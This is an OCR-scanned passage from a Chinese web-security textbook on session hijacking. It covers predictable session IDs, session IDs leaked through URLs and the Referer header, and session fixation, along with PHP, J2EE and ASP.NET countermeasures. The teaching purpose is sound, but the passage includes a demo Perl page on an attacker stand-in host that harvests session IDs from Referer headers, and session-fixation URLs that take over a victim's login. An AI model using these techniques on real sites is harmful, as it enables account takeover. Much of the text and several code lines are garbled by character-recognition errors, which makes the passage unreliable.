预测 会 话 ID 一 - 

中 间 件 推测 会 话 ID 中 间 件 的 安全 隐患 7.1 节 

XSS XSS 漏洞 4.4.1 节 

应 用 程序 HTTP 消息 头 注 入 HTTP 消息 头 注 入 漏洞 4.7.2 节 

窃取 会 话 ID 恶意 利用 Referer 嵌入 在 URL 中 的 会 话 ID 4.6.3 节 
中 间 件 司 应 用 程序 中 间 件 的 安全 隐患 7.1 节 

网 络 网 络 监听 Cookie 的 安全 属性 不 完善 等 4.8.2 节 

挟持 会 话 ID 应 用 程序 会 话 固定 攻击 会 话 ID 固定 漏洞 4.6.4 节 





















































由 上 表 可 知 ， 造 成 会 话 劫持 的 安全 隐患 多 种 多 样 ， 因 此 ， 应 对 会 话 劫持 就 需要 将 这 些 安全 隐 
患 各 个 击破 。 而 本 节 所 要 讲述 的 就 是 生成 会 话 ID 时 产生 的 如 下 安全 隐患 。 


会 话 ID 可 预测 
会 话 甩 般 和 人 URL 
国定 会 话 ID 
其 他 安全 隐患 请 参考 表 中 “解说 ”所 示 页 的 内 容 。 
令 会 话 支持 的 影响 
用 户 被 会 话 支持 后 ， 他 人 就 能 伪装 成 该 用 户 ， 进 而 造成 如 下 影响 。 
查看 用 户 的 重要 信息 (个 人 信息 、 邮 件 等 ) 
利用 用 户 的 权限 进行 操作 ( 转账 、 购 物 等 ) 
使 用 用 户 的 账号 发 送 邮件 、 发 布 文章 、 更 改 设置 等 
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4.6.2 会 话 ID 可 预测 


概要 

如 果 Web 应 用 中 会 话 ID 的 生成 规则 不 完善 ， 用 户 的 会 话 ID 就 有 可 能 被 他 人 成 功 预 测 ， 从 
而 造成 会 话 支持 。 

会 话 ID 被 他 人 预测 成 功 所 造成 的 影响 ， 同 前 面 讲述 的 会 话 支持 的 影响 一 样 。 

为 了 避免 生成 可 预测 的 会 话 ID 而 引入 安全 隐患 ， 应 当 停止 自己 实现 会 话 管理 机 制 ， 而 使 用 
久 经 考验 的 编程 语言 或 中 间 件 (PHP、Java/J2EE、ASPNET 等 ) 提供 的 会 话 管理 机 制 。 



































会 话 ID 可 预测 漏洞 总 览 

















产生 地 点 
生成 会 话 ID 的 地 方 

影响 范围 

上 -者 | 使 用 会 话 管理 的 所 有 页 面 。 特 别 是 显示 隐私 信息 或 执行 关键 处 理 的 页 面 影响 最 大 。 






























































© 影响 类 型 
伪装 


CA 影响 程度 

4 

合用 户 参与 程度 
不 需要 


站 对 策 概要 
不 要 自制 会 话 管理 机 制 ， 而 应 使 用 口碑 较 好 的 Web 应 用 开发 工具 提供 的 会 话 管理 机 制 
























































攻击 手段 与 影响 
首先 我 们 来 看 一 下 针对 会 话 ID 可 预测 漏洞 的 典型 的 攻击 模式 及 其 影响 。 
针对 会 话 ID 可 预测 漏洞 的 攻击 有 以 下 三 个 步 又 。 


1. 收集 对 象 应 用 的 会 话 ID 
2. 推测 会 话 ID 的 生成 规则 
3. 在 对 象 应 用 中 试验 推测 出 的 会 话 ID 





常见 的 会 话 ID 生成 方法 
为 了 预测 会 话 ID 的 生成 规则 ， 首 移 就 需要 对 常见 的 会 话 ID 生成 规则 有 所 了 解 。 由 于 本 书 
并 非 攻 击 指导 书 ， 因 此 不 会 详细 说 明 推 测 会 话 ID 的 方法 。 但 就 笔者 多 年 来 诊断 安全 隐患 的 经 验 
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来 说 ,会话 DD 的 生成 大 多 都 是 基于 以 下 项 目 。 
用 户 ID 或 邮箱 地 址 
远程 IP 地 址 
日 期 与 时 间 (CUNIX 时 间 戳 或 年 月 日 时 分 秒 的 字符 串 ) 
随机 数 
生成 会 话 ID 时 ， 有 时 会 原封 不 动 地 使 用 上 述 值 ， 有 时 也 会 选取 几 种 组 合 使 用 ， 然 后 再 进行 
加 密 (十 六 进 制 或 Base64 ) 或 者 散 列 函数 处 理 。 图 4-51 即 展示 了 常见 的 会 话 ID 的 生成 方法 。 


图 4-51 常见 的 会 话 ID 生成 方法 


























































































































' ID 
CH D> 
IP 地 址 a es 
RN YC 加 密 > | 人 Sin 
期 与 中 间 二 一 7 Ss 
向 列 函数 处 理 ) 一 > 
随机 数 








其 中 ,用 户 ID 和 日 期 时 间 是 外 界 能 够 得 知 的 数据 ， 而 这 也 就 是 造成 安全 隐患 的 根源 。 
针对 会 话 ID 可 预测 漏洞 展开 攻击 时 ， 攻 击 者 会 基于 已 知 信息 推导 会 话 ID 的 生成 规则 ， 将 
收集 到 的 会 话 ID 按照 图 4-51 的 模型 逐个 进行 验证 。 


令 使 用 推测 出 的 会 话 ID 尝试 伪装 
攻击 者 推测 出 会 话 ID 之 后 ， 就 会 在 对 象 应 用 中 试用 。 如 果 攻 击 取得 成 功 ， 会 话 就 会 处 于 有 
效 的 状态 ， 因 此 攻击 者 能 立刻 得 到 攻击 是 否 成 功 的 反馈 。 


令 伪 装 造成 的 影响 

攻击 者 成 功 伪装 成 用 户 后 ， 就 能 够 以 用 户 的 权限 使 用 对 象 应 用 中 的 所 有 功能 ， 如 查看 重要 信 
息 、 发 布 / 更 新 /删除 数据 或 文 昔 、 购 物 、 转 账 等 。 

但 是 ， 那 些 浏览 前 需要 再 次 输入 密码 的 页 面 ， 即 使 伪装 成 功 后 也 无 法 访问 。 因 为 会 话 劫持 的 
攻击 者 并 不 知道 用 户 的 密码 。 因 此 ， 关 键 处 理 前 要 求 用 户 再 次 输入 密码 (再 认证 )， 是 防范 会 话 
劫持 的 辅助 性 对 策 。 

另 一 方面 ， 如 果 更 改 密码 时 不 需要 输入 当前 密码 ， 攻 击 者 就 能 够 通过 更 改 密码 而 掌握 用 户 的 
密码 ， 这 时 攻击 将 造成 更 大 的 危害 。 





















































安全 隐患 的 产生 原因 
正如 前 面 所 说 ， 产 生 会 话 ID 可 预测 漏洞 的 技术 性 原因 ， 主 要 在 于 会 话 ID 是 基于 可 预测 的 
膏 息 生成 的 。 而 更 深层 的 原因 ， 则 可 以 说 是 源 于 在 应 用 中 自制 会 话 管理 机 制 。 通 常情 况 下 ， 在 
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Web 应 用 开发 中 ,特意 去 开发 生成 会 话 ID 的 程序 毫 无 意义 。 原 因 如 下 。 


主流 的 Web 应 用 开发 工具 中 提供 有 会 话 管理 机 制 
开发 能 够 生成 安全 的 会 话 ID 的 程序 有 很 高 的 技术 要 求 
而 且 ， 即 使 主流 的 Web 应 用 开发 工具 中 生成 会 话 ID 的 部 分 存在 漏洞 ， 也 肯定 会 有 安全 性 方 
面 的 专家 指出 而 使 其 得 到 完善 。 因 此 ， 如 果 是 普通 用 途 的 Web 应 用 ， 都 应 当 使 用 开发 工具 中 提 
供 的 会 话 管理 机 制 [e] 























对 策 一 
防范 会 话 ID 可 预测 漏洞 最 现实 以 及 最 有 效 的 对 策 ， 就 是 使 用 Web 应 用 开发 工具 中 提供 的 会 
话 管理 机 制 。 








由 于 某 些 特殊 原因 而 不 得 不 自制 会 话 管理 机 制 时 ， 建 议 使 用 密码 学 级 别 的 伪 随 机 数 生 成 器 
来 生成 足够 多 位 数 的 会 话 D。 


人 改善 PHP 的 会 话 ID 的 随机 性 的 方法 
PHP 中 默认 生成 会 话 D 的 方法 为 将 下 列 值 组 合 后 再 经 过 MD5 散 列 函数 处 理 。 


远程 卫 地 址 
当前 时 间 
随机 数 (不 是 密码 学 级 别 的 伪 随 机 数 ) 
这 也 符合 图 4-51 中 稼 见 的 会 话 ID 的 生成 方法 。 由 于 其 生成 会 话 ID 的 算法 相当 复杂 ， 目 前 
还 没有 该 会 话 ID 的 破解 方法 ， 但 是 这 样 的 设计 在 理论 上 并 不 能 保证 安全 性 。 
但 我 们 可 以 编辑 php.ini 文件 来 改善 会 话 ID 的 生成 规则 ， 使 其 生成 基于 安全 的 随机 数 的 会 话 
ID。 这 里 我 们 将 php.ini 设置 如 下 。 























[Session] 
;; Windows 中 不 需要 设置 entropy_file 
session.entropy file = /dev/urandom 


session.entropy length = 32 














/dev/urandom 是 Linux 等 多 数 基于 Unix 的 操作 系统 中 提供 的 随机 数 生成 器 ， 可 作为 设备 文 
件 使 用 。Linux 中 的 /dev/urandom 经 受 了 全 世界 专家 的 检验 ， 并 没有 了 曝 出 重大 问题 ， 因 此 可 以 安 
心 使 用 。 

Windows 中 没有 类 似 于 /dev/urandom 的 功能 ， 但 在 PHP5.3.3 以 后 的 版 本 中 ， 通 过 将 session. 





中 ” 指 理 论 上 能 够 保证 在 足够 长 的 时 间 内 无 法 被 预测 的 随机 数 。 
@) /dev/urandom 的 实现 方法 因 OS 而 异 ， 在 Linux 以 外 的 操作 系统 中 使 用 /dev/urandom 时 ， 请 事先 调查 确认 有 无 安全 隐 
患 的 相关 记录 。 
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entropy_length 设 为 0 以 外 的 值 ， 就 能 基于 Windows Random API 生成 的 值 来 生成 会 话 ID。 


由 于 此 设置 不 会 产生 副作用 ， 因 此 建议 读者 们 在 开发 时 将 上 述 设置 作为 开发 标准 。 
参考 : 自制 会 话 管理 机 制 产生 的 其 他 隐患 











自制 会 话 管理 机 制 时 ， 除 了 会 话 ID 可 预测 漏洞 外 ， 还 需 警 惕 其 他 安全 
诊断 安全 隐患 的 经 验 来 看 ， 以 下 安全 隐患 需要 注意 。 





隐患 。 就 笔者 多 年 来 
SQL 注入 漏洞 
目录 遍历 漏洞 











具体 来 说 ,PHP 官方 文档 中 会 话 管理 机 制 的 自 定义 API 的 示例 脚本 中 就 存在 目录 遍历 漏 
洞 "。 同 样 ， 由 于 自 定 义 PHP 的 会 话 管理 机 





吊 而 混入 SQL 注入 漏洞 的 案例 也 时 有 发 生 。 
正 因 为 存在 这 些 案例 ， 因 此 ,在 自制 或 自 定 义 会 话 管理 机 制 时 ， 务 必要 进行 慎重 的 设计 和 仔 
时 已 ，j 





细 的 检查 。 除 非 迫 不 得 已 ， 还 是 推荐 直接 使 用 既 有 的 会 话 管理 机 制 。 





4.6.3 会话 I 上 D 舱 入 URL 
概要 








会 话 ID 有 时 并 不 保存 在 Cookie 中 ， 而 是 被 保存 于 URL。PHP、Java 和 ASP.NET 等 都 提 代 


了 将 会 话 ID 组 入 URL 的 功能 。 由 于 一 些 手机 的 浏览 器 不 支持 Cookie， 因 此 手机 版 Web 应 月 
广泛 采用 将 会 话 ID 租 入 URL 的 做 法 。 而 面向 PC 的 网 站 偶尔 也 能 看 到 URL 中 包含 会 话 ID。 以 
下 就 是 会 话 ID 磐 入 URL 的 示例 。 





日 也 





http://example.jp/mail/123?SESSID=2F3BE9A31F093C 











而 为 了 防范 会 话 有 D 租 入 URL 而 导致 伪装 攻击 ， 可 以 在 程序 中 设置 禁止 将 会 话 ID 对 入 
URL。 手 机 版 的 Web 应 月 


有 等 有 时 不 得 不 将 会 话 ID 可 入 URL， 此 情况 下 的 对 策 请 参考 7.4 节 。 





会 话 了 D 租 入 URL 有 可 能 会 导致 会 话 ID 经 由 Referer 消息 头 外 泄 ， 从 而 造成 伪装 攻击 。 





QD 详情 见 笔者 的 博客 : http://www.tokumaru.org/d/20080818.html#p01。 写 作 本 书 时 已 经 确认 在 PHP 的 最 新 版 本 5.3.5 中 也 
存在 此 问题 。 
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会 话 ID 骨 入 URL 所 导致 的 安全 隐患 总 览 


产生 地 点 
生成 会 话 ID 的 地 方 
三 二 影响 范围 


使 用 会 话 管理 的 所 有 页 面 。 特 别 是 显示 隐私 信息 或 执行 关键 处 理 的 页 面 影响 最 大 






















































































伸 影响 类 型 

利用 被 害 人 的 权限 执行 关键 处 理 。 如 购物 、 发 帖 、 更 改 密码 等 

CR 影响 程度 

A 

Y 用 户 参 与 程度 
需 > 点 击 链接 ， 浏 览 邮件 中 附属 的 URL 


对 策 概 要 
在 程序 中 设置 禁止 将 会 话 ID 租 入 URL 























攻击 手段 与 影响 

下 面 我 们 就 来 看 一 下 使 URL 中 的 会 话 ID 通过 Referer 外 泄 的 方法 ， 以 及 会 话 ID 外 泄 后 造 
成 的 影响 。 

首先 来 看 PHP 的 情况 下 是 如 何 使 会 话 ID 和 能 入 到 URL 中 的 。 











令 会 话 ID 骨 入 URL 所 需 的 条 件 
前 面 已 经 提 到 过 ，PHP 可 以 通过 设置 将 会 话 了 DD 租 人 到 URL 中 。 设置 项 目 如 表 4-14 所 示 。 








表 4-14 php.ini 的 会 话 ID 设置 项 目 















































项 目 解说 默认 值 
session.use_cookies 未 用 Cookie 保存 会 话 ID 有 效 (On) 
session.use_only_cookies 又 将 会 话 ID 保存 于 Cookie 有 效 ( On ) 
session.use_trans_sid 动 将 会 话 ID 和 嵌入 URL 无 效 ( Off ) 


























将 上 述 设置 进行 组 合 后 ,会 话 ID 的 保存 位 置 就 可 以 被 归纳 为 下 表 。 


表 4-15 use_cookies 与 use_only_cookies 的 组 合 





会 话 ID 的 保存 位 置 use_cookies use_only_cookies 
会 话 ID 仅 保 存在 Cookie 中 On On 
可 以 使 用 Cookie 时 保存 在 Cookie 
中 ,不 能 Cookie 时 嵌入 URL 
无 意义 的 组 合 Off On 
始终 将 会 话 ID 藤 入 URL Off Off 
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其 中 ，session.use_trans_sid 选项 设 为 On 时 会 话 ID 会 被 自动 符 入 URL， 而 设 为 Off 的 话 则 
仅 当 应 用 中 显示 将 会 话 ID 能 入 URL 时 , 会 话 了 D 才 会 被 脱 和 人 URL。 


令 范 例 脚 本 解说 
以 下 为 将 会 话 ID 设置 为 脱 和 人 URL (不 使 用 Cookie ) 的 范例 脚本 。 为 了 不 影响 应 用 的 全 局 设 
这 里 我 们 在 .htaccess 文件 内 做 如 下 设置 。 


代码 清单 ”/462/.htaccess 





php_flag session.use cookies Off 
php_flag session.use only cookies Off 
php_flag session.use trans sid On 








示例 脚本 包含 了 3 个 PHP 文件 。 


起 始 页 页 面 
包含 外 部 链接 的 页 面 
外 部 页 面 (假定 为 攻击 者 用 来 收集 信息 的 网 站 ) 


各 上 自 的 脚本 代码 如 下 所 示 。 


代码 清单 ”/462/46-001.php 











<?php 
session start(); 
Sm 
<body> <a href="46-002.php">Next</a> </body> 








代码 清单 ”/462/46-002.php 





<?php 
session start(); 
?> 
<body> 
<a href="http://trap.example.com/46/46-900.cgi"> 跳 转 到 外 部 网 站 的 连接 </a> 
</body> 





代码 清单 、/462/46-900.cgi[【 攻击 者 用 来 收集 信息 的 网 站 】 





#!/usr/bin/perl 

use utf8; 

use strict; 

Use CGI qw/-no xhtml :standard/; 
use Encode qw/encode/; 


my $e referer = escapeHTML (referer()); 
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print encode('UTF-8', <<END OF _HTML) ; 
Content-Type: text/html; charset=UTF-8 


<body> 

这 是 收集 会 话 ID 的 网 站 。Referer 信息 如 下 <br> 
$e_referer 

</body> 

END OF HTML 





























4-52 展示 了 页 面 的 跳 转 过 程 。 点 击 链 接 后 跳 转 到 外 部 网 站 时 ，URL 中 的 会 话 ID 遭 到 了 
4-52 ”示例 页 面 跳 转 




















息 http;//examplejp/462/46-001.php - Windows Internet Explorer 己 | 加 | 灾 
GO [emeranpeipasyss00lptp v3|xl[Bsr 2~ 
变 届 5 夫 | 忻 http//examplejp/462/46-001.php | | 工具 (O) ~ 








Next 

















J 通过 Next 链接 跳 转 。 会 话 ID 包含 在 URL 中 


二 
条 http://examplejp/462/46-002.php?PHPSESSID=ep6opielqigmnk0ogv1i8jqnsu5 - Wind... [Els] % 

















GO- [8] http://examplejp/462/46-002.php?pHPSESSID=ep6, ~ | >| xX ||[S aing P ~ 


帘 收 若 夫 。 税 htpy/examplejp/462/46-002.php?PHPSESSL.. | | 工具 (oO) 
中 转 到 外 部 网 站 的 链接 会 话 ID 在 URL 中 



































| 点 击 外 部 链接 后 ，URL 被 作为 Referer 发 送 




















人 外 http://trap.example.com/462/46-900.cgi - Windows Internet Explorer [slel ¥ | 
GO» [@ p/nrap.erample.com/as2/46-900.cgi *| ?| xllISaw 27 
次 收 苇 夫 “| 税 htpy/tapexamplecom/462146-900.cgi | | IRAO)” 












这 里 是 收集 会 话 ID 的 网 站 。Referer 信 息 加 下 。 
httpy/example jp/462/46-002 .php?PHPSESSID=ep6opiclqigmnk0ogvl8jqnsu5 

















令 通 过 Referer 泄漏 会 话 ID 所 需 的 条 件 
网 站 满足 以 下 两 个 条 件 时 就 有 可 能 通过 Referer 泄漏 会 话 ID。 
能 够 使 用 被 朋 人 URL 的 会 话 ID 
存在 跳 转 至 外 部 网 站 的 链接 。 或 用 户 能 够 自己 发 布 链接 


令 攻 击 流程 

Referer 造成 的 会 话 ID 泄漏 可 分 为 偶发 事故 和 有 意 针对 安全 隐患 实施 的 攻击 这 两 种 情况 。 其 
中 ,后 者 仅 存在 于 应 用 的 用 户 能 够 自己 发 布 链接 的 网 站 。 比 如 Web 邮箱 、 论 坛 、 博 客 、 社 交 网 
站 等 。 
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接 下 来 我 们 就 以 从 Web 邮箱 实施 攻击 为 例 进 行 说 明 。 攻 击 者 发 送 带 有 链接 的 邮件 给 攻击 目 
标 应 用 的 用 户 。 邮 件 中 通过 “请 看 我 的 个 人 主页 ”或 者 “史上 最 大 让 利 折扣 ”等 语句 引诱 用 户 点 
击 链 接 跳 转 至 攻击 者 的 网 站 。 


图 4-53 从 Web 邮箱 发 动 攻击 


http://example.jp/mail/123?SESSID=2F3BE9 


> 

From: XXX 

To: 受害 人 

Subject: 请 看 我 的 个 人 主页 




































httpyVtrap.example.corn/ 











跳 转 
Referer: http://example.jp/mail/123?SESSID=2F3BE9 


APIL | 


〇 OO 的 个 人 主页 
兴 委 多 证 放 关爱 区 
XXNR RNS 
xxxxxxxx 





























会 话 ID 通过 
Referer 被 泄漏 








由 于 多 数 Web 邮箱 都 会 将 URL 格式 的 字符 串 转 换 为 链接 形式 ， 因 此 ， 用 户 一 旦 点 击 链 接 进 
入 攻击 者 的 网 站 ，Web 邮箱 的 URL 中 散 入 的 会 话 ID 就 会 通过 Referer 泄漏 到 攻击 者 网 站 。 攻 击 
者 利用 得 到 的 Referer 信息 ， 就 能 够 伪装 成 该 用 户 。 

2000 年 12 月 ， 独 立行 政法 人 产业 技术 综合 研究 所 的 高 木 浩 光 等 人 组 成 的 小 组 发 表 了 题 为 
“不 用 Cookie 而 在 URL 中 内 入 ID 的 会 话 管理 方式 的 安全 隐患 (1) 一 一 通过 取得 REFERER 信 
息 劫持 免费 邮箱 网 站 的 问题 ”的 文章 "。 文 中 列举 了 在 当时 的 7 个 Web 邮箱 服务 中 ,将 会 话 了 D 概 
入 URL 后 会 话 ID 通过 Referer 泄漏 的 状况 、 原 理 以 及 解决 方法 。 虽 然 距离 文章 发 表 已 经 过 去 了 
十 几 年 ， 但 此 问题 还 是 没有 得 到 足够 的 重视 。 


4 事故 性 的 会 话 ID 泄漏 

如 末 网 站 不 允许 用 户 自 己 发 布 链接 ， 攻 击 者 束 很 难 将 用 户 诱导 至 自己 的 网 站 ,然而 ， 即 使 在 
这 种 情况 下 ， 只 要 网 站 中 存在 指向 外 部 网 站 的 链接 ， 就 仍然 有 可 能 将 会 话 ID 泄漏 至 这 些 外 部 网 
站 。 万 一 外 部 网 站 的 管理 员 心怀 不 轨 ， 就 能 够 从 Referer 的 日 志 中 获取 会 话 ID 来 伪装 用 户 。 

此 外 ， 也 有 因 用 户 自 己 将 带 有 会 话 ID 的 URL 发 布 到 论坛 等 地 方 ， 使 该 URL 被 搜索 引擎 收 





























中 ”原文 标题 为 : Cookie 在 使 用 世 二 URL 人 忆 埋 风 这 打 ID 民 顿 二 大 七 y 涩 习 > 管 理 方式 D) 脆 弱 性 (1) 一 -REFERER 情报 
取得 代 示 妃 脆 弱 了 一 X 一 儿 计 人 下 O) 秉 吉 取 六 问题 一 一 。 原 始 的 文章 页 面 已 被 删除 ， 现 在 可 以 从 已 归档 的 页 面 中 浏 
览 该 文章 。http://web.archive.org/web/20030828174518/http://securit.gtrc.aist.g0.jp/SecurIT/advisory/webmail-1/ 
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录 而 造成 信息 泄漏 的 事件 。 
令 影 响 
筑 入 URL 的 会 话 ID 经 由 Referer 泄漏 的 影响 ， 同 前 述 的 会 话 支持 的 影响 一 样 。 


安全 隐患 的 产生 原因 
会 话 了 D 咎 入 URL 的 直接 原因 为 设置 不 完善 或 者 程序 中 存在 问题 。 














将 会 话 ID 般 入 URL 分 为 有 意 和 无 意 两 种 情况 。 而 之 所 以 特意 将 会 话 ID 航 入 URL， 可 能 是 


因为 以 下 两 点 原因 。 














2000 年 前 后 由 于 隐私 方面 的 问题 而 兴起 了 “Cookie 有 害 论 "， 造 成 了 部 分 网 站 停止 使 用 


Cookie。 


NTT Docomo 的 手机 浏览 器 迟 迟 不 支持 Cookiez， 因 此 ， 在 面向 手机 的 应 用 中 ， 将 会 话 ID 


岁入 URL 至 今 还 是 主流 方法 。 





由 于 第 三 方 Cookie” 能 够 追踪 用 户 的 访问 历史 而 造成 隐私 方面 的 问题 ， 因 此 便 产生 了 
“Cookie 有 害 论 ”。 但 是 那 次 事件 以 后 ,浏览 右 普遍 都 默认 禁用 了 第 三 方 Cookie， 所 以 也 就 没有 

















因此 ， 如 果 由 于 厌恶 Cookie 而 将 会 话 ID 艇 入 到 URL 中， 反而 会 使 个 人 信息 泄漏 等 


发 生 。 


理由 连 第 一 方 Cookie 也 都 禁用 了 。 而 且 通 常情 况 下 将 会 话 ID 保存 至 Cookie 中 是 最 安全 的 方法 ， 





EF 件 更 易于 


而 竹 机 方面 ， 由 于 截至 写作 此 书 时 大 部 分 手机 浏览 器 还 不 支持 Cookie， 因 此 完全 杜绝 向 





URL 中 舰 入 会 话 ID 是 非常 艰难 的 。 该 问题 将 在 第 7 章 中 详细 讲述 。 


对 策 





为 了 不 使 用 肯 入 在 URL 中 的 会 话 ID ， 就 需要 通过 设置 将 会 话 ID 保存 在 Cookie 中 。 下 面 就 


























来 看 一 下 各 编程 语言 中 将 会 话 ID 保存 至 Cookie 的 设置 或 编程 方法 。 


4 PHP 
PHP 中 进行 如 下 设置 后 ， 就 能 将 会 话 ID 仅 保存 在 Cookie 中 。 








[Session] 
session.use cookies = 1 
session.use only cookies = 1 








GD 2009 年 夏季 以 后 的 机 型 终于 支持 Cookie 了 。 


@ 第 三 方 Cookie 不 是 由 正在 浏览 的 网 站 发 行 的 Cookie， 而 是 指 由 横幅 广告 商 或 其 他 网 站 发 行 的 Cookie。 
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多 Java Servlet ( J2EE ) 

J2EE 中 将 会 话 ID 舱 和 人 URL (J2EE 中 称 为 URL 重 写 ) 需要 调用 HttpServletResponse 
接口 的 encodeURL 方法 或 encodeRedirectURL 方法 来 重 写 URL， 因 此 ， 只 要 保证 程序 中 没 
有 调用 的 相关 方法 ， 会话 ID 就 不 会 被 府 人 到 URL。 





S ASP.NET 

ASP.NET 中 默认 将 会 话 ID 保存 至 Cookie 中 ,但 通过 设置 web.config 也 能 采用 将 会 话 了 D 髓 
入 URL 的 方式 。 新 生成 web.config 时 可 以 不 做 任何 操作 ,但 如 果 要 更 改 既 有 网 站 的 设置 ， 就 需 
要 进行 以 下 设置 将 会 话 ID 保存 至 Cookie。 





<?xXxml version="1.0" encoding="UTF-8" ?> 
<configuration> 
<system.web> 

<sessionSstate cookieless="false" /> 


</system.web> 





</configuration> 








4.6.4 固定 会 话 ID 


概要 

会 话 劫持 的 另 一 种 攻击 手段 为 从 外 部 挟持 会 话 ID ， 这 被 称 为 会 话 固定 攻击 ( Session Fixation 
Attack )。 

会 话 固定 攻击 的 流程 如 下 。 


1. 取得 会 话 ID 

2. 强行 将 步骤 1 中 的 会 话 ID 交 给 被 害 人 
3. 被 害 人 登录 攻击 目标 Web 应 用 

4. 攻击 者 使 用 该 会 话 ID 成 功 进 入 目标 应 用 








会 话 固定 攻击 造成 的 影响 同 窃取 会 话 ID 一 样 ， 即 通过 伪装 用 户 导 致 信息 泄漏 ， 以 及 使 用 被 
害 人 的 权限 恶意 使 用 应 用 中 的 功能 ， 如 发 布 、 更 改 或 删除 数据 等 。 

应 对 会 话 固定 攻击 时 ， 由 于 想 要 彻底 杜绝 上 述 的 步骤 2 非常 困难 ， 因 此 普遍 采用 在 用 户 登 录 
时 更 换 其 会 话 ID 的 方法 ， 这 样 就 可 以 使 攻击 者 无 从 得 知 用 户 登 录 后 的 会 话 ID。 
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固定 会 话 ID 所 导致 的 安全 隐患 总 览 
产生 地 点 
进行 登录 处 理 的 地 方 
三 影响 范围 


使 用 会 话 管理 的 所 有 页 面 。 特 别 是 需要 认证 的 显示 隐私 信息 或 执行 关键 处 理 的 页 面 影响 最 大 。 


> 







































































1 影响 类 型 
伪装 


” 影响 程度 
人 


Y 用 户 参 与 程度 
大 ( 浏览 恶意 URL， 在 目标 网 站 通过 认证 









































| 对 策 概 要 
登录 时 更 换 会 话 ID 





攻击 手段 与 影响 

接 下 来 我 们 将 通过 示例 脚本 来 解说 会 话 固定 攻击 的 方法 与 影响 。 
令 示例 脚本 介绍 

为 了 方便 会 话 固 定 攻 击 的 实施 ， 该 示例 脚本 通过 设置 .htaccess 使 会 话 ID 同时 保存 在 了 
Cookie 和 URL 中。 具体 设 置 如 下 。 




















代码 清单 ”/463/.htaccess 





php_flag session.use cookies On 
php_flag session.use only cookies Off 
php_flag session.use trans sid On 








示例 脚本 为 精简 后 的 认证 页 面 和 个 人 信息 显示 页 面 。 页 面 构成 如 下 。 


用 户 名 输入 页 面 
认证 页 面 (演示 中 不 确认 密码 ) 
个 人 信息 显示 页 面 ( 显示 用 户 名 ) 


脚本 的 代码 如 下 。 


代码 清单 ”/463/46-010.php 











<?php 
session start(); 


% 
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<body> 
<form action="46-011.php" method="POST"> 
名 :<input name="id" type="text"><br> 























<input type="submit" value=" 登录 "> 
</form> 
</body> 








代码 清单 ”/463/46-011.php 





<?php 
session start(); 
$id = $_POST['id'] ; // 任何 ID 都 能 登录 成 功 
$_SESSION['id'] = $id; // 将 用 户 名 保存 至 会 话 
<body> 
<?php echo htmlspecialchars ($id, ENT COMPAT, 'UTF-8'); ?> 登录 成 功 <br> 
<a href="46-012.php"> 个 人 信息 </a> 
</body> 











0D 




















代码 清单 ”/463/46-012.php 





<?php 
session start(); 
?> 
<body> 
当前 名 :<?php echo htmlspecialchars($ SESSION['id'], 
ENT COMPAT, 'UTF-8'); ?><br> 
</body> 





























该 示例 脚本 在 正常 情况 下 的 页 面 跳 转 如 下 所 示 。 
4-54 ”示例 页 面 跳 转 


























功 htpy/example /doa OO Window USEIEGIEE 可 逢 http//examplejp/463/46-011.php - Windows Interet Explorer LS | 
GO [el roampejp/ss3/a.010php -| |x|[S eng | GO 加 hepyeemplejpnea/6otlphp ||x|[Song Pp” 
容 收 茂 R | 夸 http://examplejp/463/46-010.php | | 工具 O) ~ 遍 必 若 夫 | 税 httpy//examplejp/463/46-011.php | 工具 (oO) ~ 

ws | En | 














用 户 名 yamada 涡 和 ne 全 您 已 登录 成 功 。 


























点 击 链接 





息 httpy/examplejp/463/46-012.php - Windows Internet Explorer SIs| 3 
OO- | 回 hatpy/examplejp/463/46-012php ™ | 宁 | x | | sing PD” 
寅 收 芒 天 | 税 htpy//examplejp/463/46-012.php BR ; IRO ~ 


当前 用 户 名 ，yamada ] 
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令 会 话 固 定 攻击 解说 
下 面 我 们 来 尝试 攻击 该 示例 脚本 。 攻 击 者 使 用 如 下 URL 将 应 用 的 用 户 诱导 至 登录 页 面 。 进 
行 此 操作 前 需要 先 清空 Cookie， 因 此 请 重启 浏览 

















http://example.jp/463/46-010 .php?PHPSESSID=ABC 




















下 图 为 用 户 无 意 中 点 击 恶意 链接 后 跳 转 至 的 登录 页 面 ， 可 以 看 出 用 户 在 页 面 上 输入 了 用 户 名 
( 此 处 为 tanaka )。 然 后 用 户 点 击 登 录 按钮 后 ， 认 证 就 将 在 会 话 ID 被 固定 的 状态 下 进行 。 


图 4-55 ”在 通过 恶意 URL 跳 转 至 的 登录 页 面 进行 登录 























莉 httpy/examplejp/463/46-010.php?PHPSESSID=ABC - Windows Internet Explorer 局 | 回 | 器 
多 口 - | htpy/examplejp/463/46-010.phpzpHpsEssIp=ABC |>| x | ng 7 
突 收 天 | 态 http//examplejp/463/46-010.php?PHPSESSL. | | IA(O)” 
用 户 名 tanaka 











这 时 ，PHPSESSIS=ABC 的 会 话 ID 生效 ， 用 户 信息 就 将 被 存储 在 此 会 话 中 。 攻 击 者 在 受害 
用 户 进行 登录 时 即 可 伺机 使 用 如 下 URL 访问 被 害 人 的 个 人 信息 。 








http://example.jp/463/46-012.pPhp?PHPSESSID=RABC 








i 息 时 的 情形 如 下 图 所 示 。 为 了 区 别 于 被 害 人 的 页 面 ， 这 里 使 用 了 
Google Chrome 浏览 


图 4-56 成 功 查 看 了 被 害 人 的 个 人 信息 








J 口 examplejp/463/46-012 x 
€ 2 CGIDexamplejp/463/46-012.php?PHPSESSID=ABC 








| 村 





当前 用 户 名 : tanaka 




















由 此 可 见 ， 攻 击 者 能 够 成 功 看 到 被 害 人 的 个 人 信息 。 


令 登 录 前 的 会 话 固定 攻击 

前 面 我 们 介绍 了 针对 登录 后 的 页 面 的 会 话 固 定 攻 击 ， 而 如 果 登 录 前 的 页 面 中 使 用 了 会 话 变 
量 ， 就 同样 也 会 遭受 会 话 固定 攻击 。 这 被 称 为 登录 前 的 会 话 固定 攻击 。 下 面 我 们 就 通过 示例 脚本 
来 进行 讲解 。 

示例 脚本 代码 如 下 。 代 码 中 包括 个 人 信息 输入 、 个 人 信息 确认 、 个 人 信息 注册 (演示 中 不 执 
行 注册 处 理 ) 3 个 页 面 。 输 入 的 字符 串 被 保存 至 会 话 变 量 ， 点 击 确认 画面 上 的 “返回 ”链接 时 ， 
用 户 就 能 看 到 刚才 在 文本 框 中 输入 的 内 容 。 
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<?php 
session start(); 
$name = @$ SESSION['name']; 
smail = @$ SESSION['mail']; 
?> 
<html> 
<head><title> 输入 个 人 信息 </title></head> 
<body> 
<form action="46-021.php" method="POST"> 
姓名 :<input name="name" value="<?php 
